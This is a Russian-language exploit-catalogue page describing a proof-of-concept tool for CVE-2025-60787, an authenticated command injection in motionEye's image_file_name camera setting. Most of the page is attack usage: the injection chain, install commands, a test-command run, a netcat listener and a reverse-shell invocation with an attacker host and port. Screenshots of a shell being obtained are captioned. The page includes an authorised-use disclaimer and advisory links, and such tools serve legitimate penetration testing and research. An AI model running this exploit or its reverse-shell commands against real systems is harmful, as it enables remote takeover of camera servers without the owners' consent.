Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-60787 — CVE-2025-60787 motionEye: аутентифицированная инъекция команд — RCE PoC | Kitploit
Инструменты/GitHubGitHub/ozcanpng/cve-2025-60787
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 motionEye: аутентифицированная инъекция команд — RCE PoC

Репозиторий
22 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-60787 — motionEye аутентифицированный RCE

Аутентифицированный PoC для инъекции команд в CVE-2025-60787. motionEye v0.43.1b4 и более ранние версии записывают управляемые пользователем значения конфигурации камеры, такие как image_file_name, в конфигурацию Motion без достаточной санитизации, что позволяет выполнять команды при обработке этого значения.

Только для авторизованного тестирования и исследований. Не используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


Что делает

root@kitploit:~
Signed API request -> camera config update -> image_file_name injection -> snapshot trigger -> command execution
  1. Проверяет цель и обнаруживает motionEye.
  2. Генерирует подписанные API-запросы motionEye с использованием заданных имени пользователя и хеша пароля.
  3. Читает конфигурацию камеры через /config/list/.
  4. Внедряет команду в параметр камеры image_file_name.
  • Включает неподвижные изображения/ручные снимки там, где это необходимо.
  • Запускает /action/<camera_id>/snapshot/, чтобы motionEye обработал внедрённое имя файла.
  • Опционально восстанавливает исходную конфигурацию камеры.

  • Скриншоты

    Настройка reverse shell

    Настройка reverse shell

    Внедрение конфигурации и запуск

    Внедрение конфигурации и запуск

    Получена оболочка

    Получена оболочка


    Установка

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2025-60787.git
    cd CVE-2025-60787
    pip install -r requirements.txt
    

    Использование

    Безопасная проверка команды

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --user admin \
      --password-hash HASH \
      --cmd 'id > /tmp/motioneye_rce'
    

    Reverse shell

    Сначала запустите слушатель:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Затем выполните:

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --port 8765 \
      --user admin \
      --password-hash HASH \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    Полезные опции:

    root@kitploit:~
    --camera-id N      Идентификатор камеры для изменения (по умолчанию: 1)
    --restore          Восстановить исходную конфигурацию камеры после срабатывания
    --dry-run          Сформировать подписанные запросы без изменения цели
    --debug            Выводить канонические подписанные пути, тела и подписи
    --no-trigger       Обновить конфигурацию без запуска снимка
    --verify-tls       Проверять HTTPS-сертификаты
    --yes              Пропустить запрос подтверждения reverse shell
    

    Затронутые версии

    ПродуктЗатронутая версияТребуемый доступВоздействие
    motionEye<= 0.43.1b4Аутентифицированный доступ администратора/APIВыполнение OS-команд от пользователя процесса motionEye/Motion

    Итоговые привилегии зависят от способа развёртывания motionEye. В контейнерах или лабораторных образах, где сервис запущен от root, выполнение команд может происходить с правами root.


    Примечания

    • PoC ожидает сохранённое значение/хеш пароля motionEye, поскольку это значение используется в качестве ключа подписи для устаревших API-запросов.
    • Внедряемое поле — image_file_name.
    • Используйте --restore во время тестирования, чтобы вернуть исходную конфигурацию камеры после эксплуатации.
    • Для безопасной проверки перед попыткой reverse shell предпочтительно использовать --cmd.

    Ссылки

    • NVD — CVE-2025-60787
    • GitHub Security Advisory — GHSA-j945-qm58-4gjx
    • Проект motionEye

    Автор

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    Скачать инструмент